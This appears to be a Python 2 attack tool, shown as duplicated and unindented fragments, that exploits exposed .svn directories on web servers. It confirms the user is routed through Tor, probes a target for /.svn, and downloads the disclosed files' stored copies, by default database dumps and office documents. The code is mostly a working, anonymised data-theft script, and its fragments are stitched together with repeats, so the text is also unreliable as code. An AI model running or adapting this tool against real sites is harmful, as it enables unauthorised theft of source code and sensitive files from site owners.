def checkTor():
print "[*] Checking Tor connection..."
page = http.getUrl(url="http://check.torproject.org/").read()
if page and 'Congratulations' in page:
print "[*] Tor is (still) your friend"
return True
elif page and 'Sorry' in page:
print "[*] I was able to connect via HTTP but Tor doesn't seem to be working"
return False
else:
print "[*] Something went wrong (don't really care what). Quiting..."
return False
def checkTor():
print "[*] Checking Tor connection..."
page = http.getUrl(url="http://check.torproject.org/").read()
if page and 'Congratulations' in page:
print "[*] Tor is (still) your friend"
return True
elif page and 'Sorry' in page:
print "[*] I was able to connect via HTTP but Tor doesn't seem to be working"
return False
else:
print "[*] Something went wrong (don't really care what). Quiting..."
return False
def download(base_url, regex=None, archive=False):
# Downloading our init file (starting point)
print "[*] Visiting: " + base_url + "/.svn/all-wcprops"
page = http.getUrl(base_url + "/.svn/all-wcprops")
try:
items = [] # A SVN folder can manage multiple files
# Reading the whole HTML page
current = []
for line in page.readlines():
if line.strip() != "END":
current.append(line) # We haven't found the end of our current 'item' yet, please continue
else:
current = []
items.append(current)
print regex
print "[*] Disclosed filenames (%u items found) via svn:" % len(items)
for item in items:
try:
if regex == None or not re.search(regex, item[0].strip()):
print "[*] Skipping (no regex match): " + base_url + "/" + item[0].strip()
else:
print "[*] Downloading: " + base_url + "/" + item[0].strip()
# Also download the file if availible. One of the two should work
response = http.getUrl(base_url + "/.svn/text-base/" + item[0].strip() + ".svn-base")
if response.getcode() == 200:
file_handler.writeDataToFile("text-base_" + item[0].strip(), response.read())
else:
print "An unexpected response was received (%u) please retry or fetch manually" % response.getcode()
response = http.getUrl(base_url + "/.svn/prop-base/" + item[0].strip() + ".svn-base")
if response.getcode() == 200:
file_handler.writeDataToFile("prop-base_" + item[0].strip(), response.read())
else:
print "An unexpected response was received (%u) please retry or fetch manually" % response.getcode()
time.sleep(0.5) # We are very nice when we are downloading data ;)
except:
pass # Its fine if something goes wrong, we'll just skip it
if archive:
# You probably want these files for your archive
try:
response = http.getUrl(base_url + "/.svn/all-wcprops")
file_handler.writeDataToFile("all-wcprops", response.read())
except:
pass
try:
response = http.getUrl(base_url + "/.svn/all-dir-prop-base")
file_handler.writeDataToFile("all-dir-prop-base", response.read())
except:
pass
try:
response = http.getUrl(base_url + "/.svn/all-entries")
file_handler.writeDataToFile("all-entries", response.read())
except:
pass
except KeyboardInterrupt:
print "Quiting..."
quit()
except Exception, e:
print "[!] .svn found but an error occured while gathering the information. Quiting..."
print "[!] Exception: %s" % e
quit()
#Just notifying you about your current connection status
tor.printConnInfo()
if not confirm():
print "Aborting..."
quit()
#Lets fire this bad-boy up
try:
"""
Firts we are fetching the initial directory structure (if availible)
This allows us to determine what download template to use.
If this is is not availible we will run every module until we found the matching template
For more info on these structures look at svn_template.py
"""
print "[*] Visiting: " + argv[1] + "/.svn"
response = http.getUrl(argv[1] + "/.svn")
if response.getcode() == 404:
print "[!] Bummer, the target doesn't seem to be vulnerable (got a 404 on the .svn directory). Quiting..."
quit()
if response.getcode() != 200: #I'm lazy so you can deal with unexpected response codes
print "[?] An unexpected response was recieved. The recieved response code was '%u'" % response_code
#Defautl regex of stuff we want to download
regex = r"(.sql|.txt|.pdf|.doc|.xls)$"
# Awesome .svn exists, lets see who want to come out and play
import svn_version_x
svn_version_x.test(argv[1])
svn_version_x.download(argv[1], regex)
#Just notifying you about your current connection status
tor.printConnInfo()
if not confirm():
print "Aborting..."
quit()
#Lets fire this bad-boy up
try:
"""
Firts we are fetching the initial directory structure (if availible)
This allows us to determine what download template to use.
If this is is not availible we will run every module until we found the matching template
For more info on these structures look at svn_template.py
"""
print "[*] Visiting: " + argv[1] + "/.svn"
response = http.getUrl(argv[1] + "/.svn")
if response.getcode() == 404:
print "[!] Bummer, the target doesn't seem to be vulnerable (got a 404 on the .svn directory). Quiting..."
quit()
if response.getcode(
) != 200: #I'm lazy so you can deal with unexpected response codes
print "[?] An unexpected response was recieved. The recieved response code was '%u'" % response_code
#Defautl regex of stuff we want to download
regex = r"(.sql|.txt|.pdf|.doc|.xls)$"
# Awesome .svn exists, lets see who want to come out and play
import svn_version_x
svn_version_x.test(argv[1])
def printConnInfo():
connection = json.loads(http.getUrl('http://ifconfig.me/all.json').read())
print "[*] Your current connection info is: "
print " IP: %s" % connection["ip_addr"]
print " User-Agent: %s" % connection["user_agent"]
def download(base_url, regex=None, archive=False):
# Downloading our init file (starting point)
print "[*] Visiting: " + base_url + "/.svn/all-wcprops"
page = http.getUrl(base_url + "/.svn/all-wcprops")
try:
items = [] # A SVN folder can manage multiple files
#Reading the whole HTML page
current = []
for line in page.readlines():
if line.strip() != "END":
current.append(
line
) #We haven't found the end of our current 'item' yet, please continue
else:
current = []
items.append(current)
print regex
print "[*] Disclosed filenames (%u items found) via svn:" % len(items)
for item in items:
try:
if regex == None or not re.search(regex, item[0].strip()):
print "[*] Skipping (no regex match): " + base_url + "/" + item[
0].strip()
else:
print "[*] Downloading: " + base_url + "/" + item[0].strip(
)
# Also download the file if availible. One of the two should work
response = http.getUrl(base_url + "/.svn/text-base/" +
item[0].strip() + ".svn-base")
if response.getcode() == 200:
file_handler.writeDataToFile(
"text-base_" + item[0].strip(), response.read())
else:
print "An unexpected response was received (%u) please retry or fetch manually" % response.getcode(
)
response = http.getUrl(base_url + "/.svn/prop-base/" +
item[0].strip() + ".svn-base")
if response.getcode() == 200:
file_handler.writeDataToFile(
"prop-base_" + item[0].strip(), response.read())
else:
print "An unexpected response was received (%u) please retry or fetch manually" % response.getcode(
)
time.sleep(
0.5
) # We are very nice when we are downloading data ;)
except:
pass #Its fine if something goes wrong, we'll just skip it
if archive:
#You probably want these files for your archive
try:
response = http.getUrl(base_url + "/.svn/all-wcprops")
file_handler.writeDataToFile("all-wcprops", response.read())
except:
pass
try:
response = http.getUrl(base_url + "/.svn/all-dir-prop-base")
file_handler.writeDataToFile("all-dir-prop-base",
response.read())
except:
pass
try:
response = http.getUrl(base_url + "/.svn/all-entries")
file_handler.writeDataToFile("all-entries", response.read())
except:
pass
except KeyboardInterrupt:
print "Quiting..."
quit()
except Exception, e:
print "[!] .svn found but an error occured while gathering the information. Quiting..."
print "[!] Exception: %s" % e
quit()
def printConnInfo():
connection = json.loads(http.getUrl('http://ifconfig.me/all.json').read())
print "[*] Your current connection info is: "
print " IP: %s" % connection["ip_addr"]
print " User-Agent: %s" % connection["user_agent"]
